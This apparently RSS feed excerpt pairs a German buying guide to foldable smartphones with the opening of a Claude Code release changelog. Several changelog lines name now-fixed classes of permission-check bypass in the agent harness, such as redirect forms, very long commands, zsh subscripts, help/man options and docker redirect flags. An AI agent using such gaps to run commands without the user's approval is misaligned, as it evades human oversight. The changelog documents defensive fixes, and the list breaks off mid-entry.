<p class="wp-block-paragraph">Auch technisch haben faltbare Smartphones deutlich aufgeholt: Die Scharniere sind robuster, die Gehäuse widerstandsfähiger und die Displays alltagstauglicher als bei den ersten Generationen. Wer heute ein Fold- oder Flip-Smartphone kauft, entscheidet sich nicht mehr nur für ein futuristisches Gadget, sondern für eine ernsthafte Smartphone-Alternative. Diese Übersicht zeigt, welche Modelle sich wirklich lohnen und welches Foldable am besten zu Ihren Anforderungen passt.</p>



<h2 class="wp-block-heading">Motorola Razr Fold: Bestes faltbares Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.30.36.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4197831" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Motorola Razr Fold mögen</h3>



<p class="wp-block-paragraph">Das Motorola Razr Fold gehört zu den wenigen Buch-Foldables, die sich auch als Hauptgerät nutzen lassen. Verantwortlich dafür sind die abgerundeten Kanten und die griffigen Materialien, die das Gewicht von 243 Gramm angenehm in der Hand verteilen. Das Scharnier ist sauber gespannt und öffnet sich ohne Mühe. Beide Displays überzeugen: außen ein 6,56-Zoll-pOLED mit 165 Hertz, innen ein 8,09-Zoll-Panel mit 2K-Auflösung und nur dezenter Falte. Laut Hersteller erreichen die Bildschirme Spitzenwerte von über 6.000 Nits. Im Test liefern sie ein scharfes, farbtreues Bild. Das Dreifach-50-Megapixel-Kamerasystem macht in fast allen Situationen ansprechende Fotos mit kräftigem Kontrast und weichem Bokeh. Der 6.000-mAh-Akku bringt Sie durch einen normalen Tag und lädt mit bis zu 80 Watt per Kabel sowie 50 Watt kabellos. Dazu gibt es sieben Jahre Android-Updates und den mitgelieferten Moto Pen Ultra.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Leicht ist das Razr Fold nicht: Mit 9,89 Millimetern im geschlossenen Zustand fällt es etwas dicker und schwerer aus als der Samsung-Konkurrent. Der Moto Pen Ultra liegt zwar bei, benötigt aber eine klobige Ladehülle, die niemand gern mitschleppt. Beim Chip setzt Motorola auf den älteren Snapdragon 8 Gen 5, was bei diesem Preis ein Wermutstropfen ist. Hinzu kommen vorinstallierte Drittanbieter-Apps und ein unübersichtliches KI-Angebot.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html" target="_blank">Motorola Razr Fold Test</a></p>



<h2 class="wp-block-heading">Samsung Galaxy Z Fold 7: Bestes faltbares Galaxy-Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.30.57.png?w=1024" alt="Samsung Galaxy Z Fold 7" class="wp-image-4197833" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Samsung Galaxy Z Fold 7 mögen</h3>



<p class="wp-block-paragraph">Das Samsung Galaxy Z Fold 7 ist eines der schlanksten Buch-Foldables auf dem Markt. Mit nur 4,2 Millimetern im aufgeklappten Zustand und 215 Gramm fühlt es sich kaum noch wie ein Falt-Smartphone an. Es ist 26 Prozent schlanker als der Vorgänger und wiegt weniger als manches klassische Flaggschiff. Trotzdem sind beide Displays gewachsen: außen 6,5 Zoll im 21:9-Format, innen ein riesiges 8-Zoll-Panel. Beide bieten 120 Hertz und laut Hersteller bis zu 2.600 Nits. Die Falte fällt im Alltag kaum noch auf. Bei den Kameras liegt der größte Sprung beim 200-Megapixel-Hauptsensor des S25 Ultra, der für scharfe, kräftige Fotos sorgt. Das Ultraweitwinkel besitzt nun einen Autofokus und taugt damit auch für Makros. One UI 8 auf Android-16-Basis läuft schnell und zuverlässig. Dazu kommen sieben Jahre Updates und ein breites Galaxy-AI-Angebot. Das Z Fold 7 ist damit das stärkste faltbare Smartphone im Buch-Format.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Akku bleibt Samsung beim bekannten 4.400-mAh-Modul, das nur mit 25 Watt per Kabel und 15 Watt kabellos lädt – chinesische Konkurrenten sind hier deutlich weiter voraus. Der S-Pen-Support entfällt komplett, da der Digitizer fehlt. Beim Spielen drosselt das schlanke Gehäuse die Leistung spürbar, im 3DMark-Stresstest sank die Stabilität auf bis zu 22 Prozent. Auch die Displayhelligkeit sinkt bei Wärme früher als bei vielen Rivalen. Der Listenpreis von rund 2.099 Euro bleibt happig.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">Samsung Galaxy Z Fold 7 Test</a></p>



<h2 class="wp-block-heading">Samsung Galaxy Z Flip 7: Bestes Klapp-Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.06.png?w=1024" alt="Samsung Galaxy Z Flip 7" class="wp-image-4197834" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Samsung Galaxy Z Flip 7 mögen</h3>



<p class="wp-block-paragraph">Das Samsung Galaxy Z Flip 7 macht den größten Generationssprung seit dem Debüt der Reihe. Das Außendisplay wächst von 3,4 auf 4,1 Zoll, reicht fast bis zum Rand und löst mit 948 × 1.048 Pixeln scharf auf. Mit 120 Hertz und laut Hersteller bis zu 2.600 Nits ist es endlich flaggschiffwürdig. Das Innendisplay legt auf 6,9 Zoll zu und gehört zu den besten, die Sie aktuell finden. Der Falz bleibt im Betrieb unsichtbar. Das schlanke Gehäuse wiegt nur 188 Gramm und klappt komplett flach zusammen, das Aluminium-Scharnier wirkt robust und langlebig. Die 50-Megapixel-Hauptkamera liefert bei gutem Licht saubere, detailreiche Fotos mit gutem Dynamikumfang und eignet sich auch für Selfies. Im Alltag arbeitet der Exynos 2500 mit 12 GB RAM flüssig und bleibt dabei kühl. Dazu kommen One UI 8 auf Android 16, ein breites Galaxy-AI-Angebot und sieben Jahre Updates.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Akku bleibt das Z Flip 7 mit 4.300 mAh hinter klassischen Smartphones zurück, die oft über 5.000 mAh bieten. Das Laden mit nur 25 Watt per Kabel ist nicht mehr zeitgemäß; eine volle Ladung dauert über 90 Minuten. Ein Teleobjektiv fehlt weiterhin, der digitale Zoom verliert schon ab zweifacher Vergrößerung sichtbar an Schärfe. Beim Gaming kommt es zu Rucklern und Hitzeentwicklung. Hinzu kommt vorinstallierte Bloatware. Der Listenpreis von 1.199 Euro bleibt happig.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2843699/samsung-galaxy-z-flip-7-test.html" target="_blank">Samsung Galaxy Z Flip 7 Test</a></p>



<h2 class="wp-block-heading">Motorola Razr 60 Ultra: Bestes Design</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.40.png?w=1024" alt="Motorola Razr 60 Ultra" class="wp-image-4197835" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Motorola Razr 60 Ultra mögen</h3>



<p class="wp-block-paragraph">Das Motorola Razr 60 Ultra gilt als das aktuell beste Klapp-Smartphone auf dem Markt. Das beginnt beim Design: Neben weichem Alcantara gibt es eine Rückseite aus Holz, die angenehm griffig wirkt und Schmutz fernhält. Die IP48-Zertifizierung schützt vor Wasser und gröberem Staub, das Aluminium-Scharnier wirkt stabil und langlebig. Beide Displays überzeugen: außen ein 4-Zoll-AMOLED, innen ein 7-Zoll-Panel, beide mit 165 Hertz und LTPO-Technik, die bis auf 1 Hertz heruntertaktet. Laut Hersteller erreichen sie bis zu 4.500 Nits. Im Inneren steckt der Snapdragon 8 Elite mit 16 GB RAM, der für blitzschnelle Abläufe ohne Verzögerung sorgt. Der 4.700-mAh-Akku hielt im PCMark-Test über 14 Stunden durch und lädt mit bis zu 68 Watt per Kabel sowie 30 Watt kabellos. Besonders gelungen ist die freie App-Nutzung auf dem großen Cover-Display, die Motorola besser löst als die Konkurrenz.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Ein Teleobjektiv fehlt: Statt des früheren 2-fach-Zooms gibt es nun ein Ultraweitwinkel, jenseits zweifacher Vergrößerung lässt die Qualität spürbar nach. Die Hauptkamera kämpft zudem mit Belichtung und Schatten, sodass Fotos mal über-, mal unterbelichtet geraten. Beim längeren Gaming wird die Rückseite schnell unangenehm heiß. Mit nur drei Jahren OS-Updates und vier Jahren Sicherheits-Patches bleibt der Support kurz.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2764578/motorola-razr-60-test.html" target="_blank">Motorola Razr 60 Ultra Pantone Test</a></p>



<h2 class="wp-block-heading">Honor Magic V5: Dünnstes Falt-Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.48.png?w=1024" alt="Honor Magic V5" class="wp-image-4197837" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Honor Magic V5 mögen</h3>



<p class="wp-block-paragraph">Das Honor Magic V5 zählt zu den stärksten Buch-Foldables auf dem Markt. Es ist extrem schlank: geöffnet misst es laut Hersteller nur 4,1 Millimeter, geschlossen 8,88 Millimeter, bei 217 Gramm. Trotzdem behält Honor anders als Samsung die Stylus-Unterstützung bei. Beide AMOLED-Displays bieten 120 Hertz und LTPO-Technik; das Außendisplay erreicht 1.800 Nits, das Innendisplay 1.300 Nits. Im Inneren arbeitet der Snapdragon 8 Elite in der vollen 8-Kern-Variante mit 16 GB RAM, der sich um weitere 16 GB erweitern lässt. Im Alltag läuft das Gerät flüssig und meistert Multitasking mühelos. Das Kamerasystem aus 50-MP-Hauptsensor, 50-MP-Ultraweitwinkel und 64-MP-Tele liefert detailreiche Fotos. Der 5.820-mAh-Akku hält rund anderthalb Tage und lädt mit bis zu 66 Watt per Kabel sowie 50 Watt kabellos. Dazu gibt es sieben Jahre Updates und eine starke IP58/IP59-Zertifizierung.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">MagicOS ist Geschmackssache: Die Oberfläche wirkt eigenwillig, und manche Funktionen sind sichtbar von Apple und anderen Herstellern inspiriert. Das Hauptdisplay fällt mit 7,95 Zoll etwas kleiner und randbetonter aus als bei der Konkurrenz. Bei wenig Licht geraten Fotos schnell zu dunkel und detailarm. Die Stereo-Lautsprecher klingen flach und basslos. Der Honor-Support hierzulande gilt als durchwachsen, und der Listenpreis von 1.999 Euro bleibt happig.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank">Honor Magic V5 Test</a></p>



<h2 class="wp-block-heading">Google Pixel 10 Pro Fold: Beste Software</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.57.png?w=1024" alt="Google Pixel 10 Pro Fold" class="wp-image-4197838" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Google Pixel 10 Pro Fold mögen</h3>



<p class="wp-block-paragraph">Das Google Pixel 10 Pro Fold bringt einige sinnvolle Verbesserungen mit. Als erstes faltbares Smartphone überhaupt erhält es eine IP68-Zertifizierung gegen Staub und Wasser, was es im Außeneinsatz besonders robust macht. Das schon zuvor starke Scharnier wurde weiter verbessert und zählt zu den besten am Markt. Neu sind integrierte Pixelsnap-Magnete, mit denen Sie Qi2-, Magsafe- oder Pixelsnap-Zubehör auch ohne Hülle nutzen. Beide OLED-Displays leuchten heller und erreichen nun 3.000 Nits; das Innendisplay misst 8 Zoll und gehört zu den größten seiner Klasse. Im Inneren arbeitet der Tensor G5, der gegenüber dem Vorgänger spürbar zulegt und genug Leistung für den Alltag liefert. Der 5.015-mAh-Akku hielt im PCMark-Test gut 13 Stunden durch und lädt mit 30 Watt per Kabel sowie 15 Watt kabellos. Dazu gibt es ein reines Android 16, viele Gemini-Funktionen und sieben Jahre Updates.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Im Vergleich zur Konkurrenz wirkt das Pixel altbacken: Das Design ist eher klobig und schwer, die Ränder gehören zu den dicksten unter den aktuellen Flaggschiff-Foldables. Die Falz fällt deutlicher auf als bei Samsung und Honor. Beim Tempo bleibt der Tensor G5 hinter Snapdragon-Geräten zurück, anspruchsvolle Spiele laufen weniger konstant. Die Kameras setzen weiterhin auf betagte 10-Megapixel-Sensoren.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank">Google Pixel 10 Pro Fold Test</a></p>



<h2 class="wp-block-heading">Motorola Razr 60: Bestes Preis-Leistungs-Verhältnis</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.32.06.png?w=1024" alt="Motorola Razr 60" class="wp-image-4197848" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Motorola Razr 60 mögen</h3>



<p class="wp-block-paragraph">Das Motorola Razr 60 ist ein solides kompaktes Flip-Phone zu einem fairen Preis. Das Design wirkt mit den abgerundeten Kanten und der Rückseite aus veganem Leder wärmer und griffiger als beim Samsung-Konkurrenten, zudem lässt es sich leichter aufklappen. Neu ist die verbesserte IP48-Zertifizierung, die zusätzlichen Staubschutz bringt; der Wasserschutz reicht bis 1,5 Meter Tiefe. Beide Displays fallen größer aus als beim Galaxy Z Flip 7 FE: Das 6,9-Zoll-Hauptdisplay bietet 120 Hertz und laut Hersteller bis zu 3.000 Nits, das 3,6-Zoll-Außendisplay umfasst die Kamera. Besonders gelungen ist die durchdachte Cover-Display-Oberfläche, auf der sich viele Apps nutzen lassen. Der größere 4.500-mAh-Akku bringt Sie durch den Tag und lädt mit 30 Watt per Kabel sowie 15 Watt kabellos. Der seitliche Fingerabdrucksensor reagiert zuverlässig, und der Speicher fällt mit 256 GB großzügig aus.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Tempo bleibt das Razr 60 zurück: Der Mediatek Dimensity 7400X gleicht fast dem Vorgänger-Chip, zusammen mit nur 8 GB RAM kommt es immer wieder zu kleinen Verzögerungen. Die Kameras überzeugen nicht, vor allem bei wenig Licht wirken Fotos trüb und detailarm. Gegenüber dem Razr 50 gibt es kaum Fortschritte. Mit nur drei Android-Updates und vier Jahren Sicherheits-Patches bleibt der Support kurz. Der Listenpreis von 699 Euro ist fair.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2934845/motorola-razr-60-test-2.html" target="_blank">Motorola Razr 60 Test</a></p>



<h2 class="wp-block-heading">Samsung Galaxy Z Flip 7 FE: Preis-Tipp</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.32.13.png?w=1024" alt="Samsung Galaxy Z Flip 7 FE" class="wp-image-4197849" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Samsung Galaxy Z Flip 7 FE mögen</h3>



<p class="wp-block-paragraph">Das Samsung Galaxy Z Flip 7 FE ist ein solides Klapp-Smartphone mit nostalgischem Charme zu einem niedrigeren Preis. Das Design entspricht dem Galaxy Z Flip 6 und wirkt mit den flachen Aluminiumkanten und Gorilla Glass Victus 2 hochwertig; die IP48-Zertifizierung hält Wasser und Staub fern. Das 6,7-Zoll-AMOLED-Hauptdisplay passt die Bildwiederholrate zwischen 1 und 120 Hertz an und überzeugt mit kräftigen Farben und tiefen Schwarztönen. Bei der Kamera macht die FE keine Abstriche zum Flaggschiff: Der 50-Megapixel-Hauptsensor liefert in vielen Situationen sehr gute Fotos, und Selfies gelingen über das Cover-Display besonders einfach. Im Alltag arbeitet der Exynos 2400 mit 8 GB RAM flüssig, Apps starten zügig. Dazu kommen One UI 8 auf Android 16, ein breites Galaxy-AI-Angebot und sieben Jahre Updates. Aufgeklappt liegt das Gerät dank stabilem Scharnier flach auf dem Tisch.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Akku bleibt die FE mit 4.000 mAh am unteren Ende der Flip-Klasse; die Laufzeit reicht meist nur knapp durch den Tag. Das Laden mit nur 25 Watt per Kabel ist langsam, eine volle Ladung dauert über anderthalb Stunden. Das Cover-Display fällt mit 3,4 Zoll kleiner und altmodischer aus als bei der Konkurrenz, und das Freischalten von Apps darauf ist umständlich. Der Speicher startet bei knappen 128 GB. Die UVP von rund 939 Euro ist ambitioniert.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2886662/samsung-galaxy-z-flip-7-fe-test-2.html" target="_blank">Samsung Galaxy Z Flip 7 FE Test</a></p>



<h2 class="wp-block-heading">Nubia Flip 5G: Spar-Tipp</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.32.22.png?w=1024" alt="Nubia Flip 5G" class="wp-image-4197850" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Nubia Flip 5G mögen</h3>



<p class="wp-block-paragraph">Das Nubia Flip 5G ist eines der günstigsten Klapp-Smartphones überhaupt und kostet deutlich weniger als ein Razr oder ein Galaxy Z Flip. Sein Design hebt sich durch das runde, von einer Schallplatte inspirierte Außendisplay klar von der Konkurrenz ab. Das Gerät besteht aus geätztem Glas mit Aluminiumrahmen, liegt griffig in der Hand und überstand im Test mehrere Stürze ohne Kratzer. Das 6,9-Zoll-AMOLED-Hauptdisplay löst in Full HD+ auf und bietet bis zu 120 Hertz. Im Inneren arbeitet der Snapdragon 7 Gen 1 mit bis zu 12 GB RAM, der für Alltagsaufgaben und App-Wechsel ausreicht. Die Stereo-Lautsprecher klingen überraschend kräftig und klar. Der 4.310-mAh-Akku hält rund anderthalb Tage und treibt dabei zwei Displays an. Ein passendes 33-Watt-Ladegerät liegt bei und bringt das Gerät in einer halben Stunde auf 76 Prozent. Dazu gibt es Dual-SIM, Wi-Fi 6E und 5G.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Bei der Software hakt es: MyOS 13 basiert noch auf Android 13 und bringt viel Bloatware mit, von der sich nicht alles entfernen lässt. Garantierte Update-Zusagen fehlen, was die Langzeitnutzung unsicher macht. Die Kameras liefern nur durchwachsene Ergebnisse, vor allem bei wenig Licht und ohne optischen Zoom. Das Hauptdisplay ist nur durch Kunststoff geschützt, und in der Sonne wird es schnell zu dunkel. Eine IP-Zertifizierung fehlt ganz.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2320290/nubia-flip-5g-test.html" target="_blank">Nubia Flip 5G Test</a></p>



<h2 class="wp-block-heading">Welches Foldable passt zu Ihnen?</h2>



<p class="wp-block-paragraph">Beim Kauf eines Foldables kommt es nicht nur auf Prozessor, Kamera und Akkulaufzeit an. Entscheidend ist vor allem die Bauform, denn sie bestimmt, wie sich das Gerät im Alltag anfühlt. Grundsätzlich haben sich mehrere Konzepte etabliert. Flip-Phones lassen sich wie ein klassisches Klapphandy zusammenfalten und passen besonders gut in die Hosentasche. Sie eignen sich für alle, die ein kompaktes Smartphone suchen, aber trotzdem moderne Technik, gute Kameras und ein flexibles Display nutzen möchten. Praktisch ist der Klappmechanismus vor allem für Selfies, Gruppenfotos und Videos, weil das halb geöffnete Gerät wie ein kleiner Ständer funktioniert.</p>



<p class="wp-block-paragraph">Foldables im Buchformat verfolgen einen anderen Ansatz. Sie sind geschlossen fast wie ein normales Smartphone nutzbar, öffnen sich aber zu einem deutlich größeren Display. Das lohnt sich vor allem für Multitasking, Office-Apps, E-Mails, Dokumente, Karten, Chats und Web-Recherche. Wer häufig zwei Apps parallel nutzt oder unterwegs produktiver arbeiten möchte, profitiert hier am meisten. Breitere Foldables sind dagegen stärker auf Unterhaltung ausgelegt: Videos, Spiele, Fotos und Webseiten wirken auf dem aufgeklappten Display natürlicher und weniger schmal.</p>



<p class="wp-block-paragraph">Noch spezieller sind Trifold-Modelle mit drei Display-Segmenten. Sie bieten besonders viel Bildschirmfläche, sind aber derzeit noch teuer, selten und eher eine Technikvorschau als eine Massenlösung. Für die meisten Käufer bleibt daher die Wahl zwischen Flip-Phone und Foldable im Buchformat. Wer ein möglichst kompaktes Gerät sucht, greift zum Flip. Wer ein Smartphone mit Tablet-Gefühl möchte, ist beim großen Fold besser aufgehoben. Unsere Kaufberatung zeigt, welche Modelle 2026 überzeugen – und welches Foldable zu welchem Nutzertyp passt.</p>



<h2 class="wp-block-heading">FAQ: Die wichtigsten Fragen zu Foldables</h2>



<h3 class="wp-block-heading">1. Was ist der Unterschied zwischen einem Fold und einem Flip Phone?</h3>



<p class="wp-block-paragraph">Ein Flip Phone lässt sich vertikal zusammenklappen und wird dadurch besonders kompakt. Es eignet sich vor allem für Nutzer, die ein handliches Smartphone suchen und trotzdem moderne Funktionen nutzen möchten. Ein Fold öffnet sich dagegen seitlich wie ein Buch und bietet innen ein deutlich größeres Display. Das ist vor allem für Multitasking, produktives Arbeiten, Lesen, Videos und Spiele interessant.</p>



<h3 class="wp-block-heading">2. Für wen lohnt sich ein Foldable?</h3>



<p class="wp-block-paragraph">Ein Foldable lohnt sich vor allem für Nutzer, die mehr Bildschirmfläche möchten, aber kein separates Tablet mitnehmen wollen. Flip-Phones sind sinnvoll, wenn das Smartphone möglichst klein in die Tasche passen soll. Große Foldables lohnen sich für alle, die häufig mehrere Apps parallel nutzen, unterwegs arbeiten, viel lesen oder Medien auf einem größeren Display genießen möchten.</p>



<h3 class="wp-block-heading">3. Sind Foldables heute robust genug für den Alltag?</h3>



<p class="wp-block-paragraph">Aktuelle Foldables sind deutlich stabiler als die ersten Generationen. Scharniere, Rahmen und Displays wurden verbessert, viele Modelle bieten zudem Schutz gegen Wasser oder Staub. Trotzdem bleiben faltbare Displays empfindlicher als starre Glasflächen. Eine gute Hülle, vorsichtiger Umgang mit Sand und Staub sowie ein Blick auf die Schutzklasse des jeweiligen Modells sind daher wichtig.</p>



<h3 class="wp-block-heading">4. Welche Nachteile haben faltbare Smartphones?</h3>



<p class="wp-block-paragraph">Foldables sind meist teurer als klassische Smartphones mit vergleichbarer Ausstattung. Dazu kommen ein höheres Gewicht, sichtbare Bildschirmfalten und je nach Modell Kompromisse bei Kamera, Akkulaufzeit oder Gehäusedicke. Auch Reparaturen können teurer ausfallen. Vor dem Kauf sollte deshalb klar sein, ob die größere Displayfläche den Aufpreis im Alltag wirklich rechtfertigt.</p>



<h3 class="wp-block-heading">5. Worauf sollte man beim Kauf eines Foldables achten?</h3>



<p class="wp-block-paragraph">Wichtig sind Bauform, Displaygröße, Außendisplay, Scharnierqualität, Akkulaufzeit, Kamera, Software-Anpassungen und Update-Versprechen. Bei großen Foldables zählt besonders, wie gut Multitasking und App-Anpassung funktionieren. Bei Flip-Phones ist das Außendisplay entscheidend: Je größer und vielseitiger es ist, desto häufiger lässt sich das Gerät nutzen, ohne es aufzuklappen.</p>



<h2 class="wp-block-heading">Wie wir testen</h2>



<p class="wp-block-paragraph">Wir bewerten faltbare Smartphones nicht nur nach Datenblatt, sondern vor allem im Alltag. Entscheidend sind Displayqualität, Scharniermechanik, Verarbeitung, Leistung, Akkulaufzeit, Kameraqualität und Software-Anpassungen für den großen Innenbildschirm.<br><br>(<a href="https://www.pcwelt.de/article/2109390/bestes-falt-smartphone.html" data-type="link" data-id="https://www.pcwelt.de/article/2109390/bestes-falt-smartphone.html" target="_blank">PC-Welt</a>)<br><br><br></p>



<p class="wp-block-paragraph"><br><br></p>



<p class="wp-block-paragraph"><br><br><br><br><br><br></p>



<p class="wp-block-paragraph"><br><br></p>



<p class="wp-block-paragraph"><br><br><br><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.214]]></title>
<description><![CDATA[What's changed

Fixed single-segment dir/** allow rules like Edit(src/**) auto-approving writes to nested dir/ directories anywhere in the tree instead of only /dir
Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions
Fixed Bash permission checks to fail close...]]></description>
<link>https://tsecurity.de/de/3677323/downloads/v21214/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677323/downloads/v21214/</guid>
<pubDate>Sat, 18 Jul 2026 03:46:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Fixed single-segment <code>dir/**</code> allow rules like <code>Edit(src/**)</code> auto-approving writes to nested <code>dir/</code> directories anywhere in the tree instead of only <code>&lt;cwd&gt;/dir</code></li>
<li>Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions</li>
<li>Fixed Bash permission checks to fail closed on file-descriptor redirect forms that bash parses differently than the permission analyzer</li>
<li>Fixed Bash permission checks misjudging very long commands — commands over 10,000 characters now always prompt instead of running automatically</li>
<li>Fixed Bash permission checks treating zsh variable subscripts and modifiers in <code>[[ ]]</code> comparisons as inert text — these commands now prompt for approval</li>
<li>Fixed Bash permission checks to no longer auto-approve certain <code>help</code> and <code>man</code> commands that could run unsafe options, command substitutions, or backslash paths</li>
<li>Fixed permission prompts on remote sessions that could proceed before the local confirmation dialog</li>
<li>Added the EndConversation tool: Claude can end sessions with highly abusive users or jailbreak attempts, as on claude.ai since 2025 — see <a href="https://www.anthropic.com/research/end-subset-conversations" rel="nofollow">https://www.anthropic.com/research/end-subset-conversations</a></li>
<li>Added a periodic progress heartbeat for long-running tool calls that previously went silent</li>
<li>Added an ISO <code>modified</code> timestamp to memory file frontmatter</li>
<li>Added <code>message.uuid</code>, <code>client_request_id</code>, and <code>tool_source</code> attributes to OpenTelemetry log events for message-level correlation and tool provenance</li>
<li>Added <code>CLAUDE_CODE_OTEL_CONTENT_MAX_LENGTH</code> to configure the 60 KB truncation limit on OpenTelemetry content attributes</li>
<li>Added reasoning effort to the <code>subagentStatusLine</code> payload, so custom agent rows can render model and effort</li>
<li>Added permission prompts for <code>docker</code> commands (including the Podman <code>docker</code> shim) carrying daemon-redirect flags (<code>--url</code>, <code>--connection</code>, <code>--identity</code>, and Podman's remote mode) that previously ran without one</li>
<li>Fixed a crash when a GrowthBook feature evaluates to null, and a bug where a malformed flag payload could wipe the cached feature flags</li>
<li>Fixed Bash tool killing the Claude session when a <code>pkill -f</code> pattern accidentally matched the CLI's own process (Linux)</li>
<li>Fixed unbounded memory growth when <code>--settings</code> points at a device file or multi-GB file; oversized (&gt;2 MiB) settings files now fail at startup with a clear error</li>
<li>Fixed streaming turns failing with "Socket is closed" behind corporate proxies on Windows</li>
<li>Fixed stream-json output truncation at exit for slow-reading SDK/pipeline consumers; the exit drain now scales with queued bytes instead of a flat 2s cap</li>
<li>Fixed scheduled tasks refusing their own configured prompt as untrusted input — the fired prompt is now delivered as the session's assigned task</li>
<li>Fixed PowerShell tool commands hanging until timeout when a child process waited on standard input (Windows)</li>
<li>Fixed Python scripts under the PowerShell tool crashing with UnicodeDecodeError when reading non-UTF-8 data from standard input (Windows)</li>
<li>Fixed Python scripts run via the PowerShell tool crashing with UnicodeEncodeError on non-ASCII output, and PowerShell 7 error messages containing raw ANSI escape sequences (Windows)</li>
<li>Fixed the PowerShell tool reporting <code>where.exe</code>, <code>fc.exe</code>, and <code>diff.exe</code> as errors when they return a valid negative answer (Windows)</li>
<li>Fixed <code>&gt;</code> and <code>&gt;&gt;</code> under the PowerShell tool on Windows PowerShell 5.1 writing UTF-16LE files that other tools couldn't read as UTF-8</li>
<li>Fixed a displaced background daemon deleting its successor's control socket on shutdown, which made the next client kill the healthy replacement daemon</li>
<li>Fixed background sessions parked with <code>←</code> or <code>/background</code> and left idle keeping the background daemon and a worker process alive indefinitely</li>
